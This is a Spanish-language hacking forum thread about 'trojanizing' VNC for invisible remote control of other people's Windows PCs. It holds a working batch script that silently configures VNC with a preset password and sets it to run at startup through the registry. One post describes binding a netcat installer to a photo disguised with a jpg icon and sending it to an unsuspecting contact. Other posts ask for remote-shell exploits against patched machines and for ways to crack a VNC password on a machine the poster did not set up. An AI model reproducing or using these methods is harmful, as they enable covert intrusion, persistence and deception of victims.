Troyanizando VNC - Control Remoto Invisible

Iniciado por Gospel, 22 Septiembre 2004, 10:59 AM

0 Miembros y 3 Visitantes están viendo este tema.

Nicx

El problema es que no estoy conectado en una red local, entonces tuve que probar en mi propia computadora, pero el vnc que estaba en el tutorial no permite conexion con localhost. Por eso tuve que bajar la nueva version de vnc, y resulto que no me funcionò bien.....

seria bueno utilizar el vnc modificada del tutorial en un pc remota... pero la mayoria de las computadoras tiene parcheada el ms03-026 y el (ms04-011).
Que otra vulnerabilidad me recomieda para conseguir shell remota?

graciassssssssssssssss por responder.................. :rolleyes:

wack-a-mole

Para mi la mejor vulnerabilidad es la ignorancia de la gente! ;)
Yo lo que hago es que hago un .bat que copie el nc.exe y lo agregue al registro. Luego compilo este .bat a .exe con http://www.abyssmedia.com/quickbfc/index.shtml , y finalmente con el DropperGen hago un bind de este archivo con una foto,  y le pongo un icono de jpg al .exe que resulta :) Lo meto en un .zip, busco mi contacto mas idiota y se lo mando, cuando lo abre, se abre la foto y en el fondo me instala el Netcat, y no se da cuenta de nada :) Ya tengo una shell, por tftp le subo el VNC! Voila!
Si nuestro cerebro fuera tan sencillo que lo pudieramos entender, seríamos tan estúpidos que no lo entenderíamos.

ketamina

Muy buenas, este es mi primer post en el foro asik saludotes a tod@.
Tengo una duda, mi problema no es colar el VNC, ya k el PC a atacar le tiene ya puesto el servidor con una contraseña d 4 caracteres k desconozco, puesto k yo no le he instalado. He intentado verla con los programas esos k dicen k t muestran los asteriscos de las claves pero nada he probado 3:(OPENPASS.EXE, DECODER.EXE Y PASS REVELATOR) y ya digo k fracaso total no funciono ninguno d los 3, asik si sabeis donde guarda la pass el VCN y me lo contais os lo agradeceria, o de algun otro programa k t lo diga aunk sea x fuerza bruta yak como solo tiene 4 caracteres no creo k tarde mucho. Salu2!

zhyzura

si te fijas un poco en el manual, uno de los .bat que creamos es el que pone la contraseña en el registro de windows, asi de que la ubicacion exacta de donde esta guardada la contraseña no es dificil que la sepas por que la dice claramente en el manual.

otra cosa, si tienes acceso al pc que tiene el server por que no utilizas crackvnc o Cain para sacar el pass de forma simple?.

Nicx
esas solo son dos vulnerabilidades de tantas que hay, ya hay varias que te dan shell remota y que ademas afectan al SP2 de XP, date una vuelta por el foro de bugs y explits y seguro veras bastantes.
otra cosa, primero averigua los parches que tiene para que asi sepas cuales vulnerabilidades usar.

ketamina

thank you x tu respuesta zhyzura, pero sigo sin enterarme, en la página 3 pone el código de este BAT:
Código:
REG ADD HKEY_CURRENT_USER\Software\ORL
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v AutoPortSelect /t REG_DWORD /d 1 /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v InputsEnabled /t REG_DWORD /d 1 /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v OnlyPollConsole /t REG_DWORD /d 1 /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v OnlyPollOnEvent /t REG_DWORD /d 0 /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v Password /t REG_BINARY /d 32149bb09b18f887 /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v PollForeground /t REG_DWORD /d 1 /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v PollFullScreen /t REG_DWORD /d 0 /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v PollUnderCursor /t REG_DWORD /d 0 /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v SocketConnect /t REG_DWORD /d 1 /f
REG ADD HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Winvnc /t REG_SZ /d "C:\WINDOWS\system32\winvnc"
start c:\WINDOWS\system32\winvnc.exe

imagino k la linea "REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v Password /t REG_BINARY /d 32149bb09b18f887 /f" es la k contiene la contraseña y en concreto seria "32149bb09b18f887" en formato exadecimal, asik lo he pasado a decimal y buscado los codigos correspondientes a ASCII y me sale en el ejemplo vuestro esto "2¶ø_ø^X°ç" y en mi caso particular contraseña no valida. X lo k deduzco k algo hago mal.
Con respecto a lo dl programa crackVNC no le conocia aunk le he intentado buscar y no le hevisto, el Cain si k le he usado para PWL, pero para VNC nose k archivo le tengo k decir k examine. Saludotes!

ketamina

ya he encontrado el crack con resultados positivos xD, pero me pica la curiosidad d lo dl regedit, si me lo podeis explicar..... enga Salu2!

carls03

Hey
muy bueno tu manual
solo que al apercer lo estas explicando para el real VNC
Mi pregunta es si fuinciona con el TigthVNC

zhyzura

pues si el TigthVNC coloca las entradas en el mismo lugar no debe de haber ningun problema.

aunque si usaras otra version, tendrias que modificar el server para que no aparezca ningun icono en la barra de tareas.

andrenio

Hola Zhysura y Gospel feat, me he leido el paper de troyanizar el VNCy esta muy bueno.
Les tengo un apunte, a lo mejor ustedes diran, que depronto lo que voy a describir aqui ya se sabia, pero pues para mi es totalmente nuevo, y por eso quiero compartirlo con ustedes, pues lo he buscado y no encontre nada al respecto, y de pronto sirve para otros.

Cuando empece a leer tu paper, en el principio dices, que ambos equipos usan sistema operativo windows, y me desanime, trabajo con Slack. :)

Entonces me propuse a hacerlo funcionar tambien con linux, y esta es la situacion:

Equipo atacante Con Linux Slackware ip 10.20.20.187
Equipo victima Con Windows Xp Sp2 ip 10.20.20.2

Con el nc, todo de maravilla logicamente, no hay ningun problema, pero con el viewer del vnc si, pues es una aplicacion netamente windows.

Listo me decidi a hacer funcionar el VNC Viewer en linux, yo simpre tengo instalado wine, para ejecutar aplicaciones windows en mi maquina linux, pero a cosas, el Viewer es de las pocas aplicaciones que no me quiso cojer.
Siguiente opcion, rdesktop, una aplicacion para escritorio remoto, pero tampoco me rulo.
Cuando ya estaba a punto de tirar la toalla, y haciendo ensayos con este aplicativo, y con este otro, de repente se me ilumino, haciendo un
nmap -vv -sS 10.20.20.2
Me di cuenta que el equipo con el VNC, no tenia un puerto abierto, sino dos, y que uno de esos hacia referencia a algo de HTTP.

Asi que desde el Firefox, http://10.20.20.2:5800/ Y LISTO !!!!
Escritorio remoto desde el entorno WEB.

Nota, si no se tiene instalado el plugin para java, no hay problema, pues todas las distribuciones de hoy dia incorporan el java, lo unico que hay que realizar es lo siguiente:
cd /home/usuario/mozilla/plugins
ln -s /ruta_instalacion_java/plugin/i386/ns7/libjavaplugin_oji.so ./
(en caso de slackware la ruta de java es 1-.2 plugin/i386/ns7/libjavaplugin_oji.so)
Reinicias el navegador, abilitas el java, y ya esta.



Reeverb

#129
dx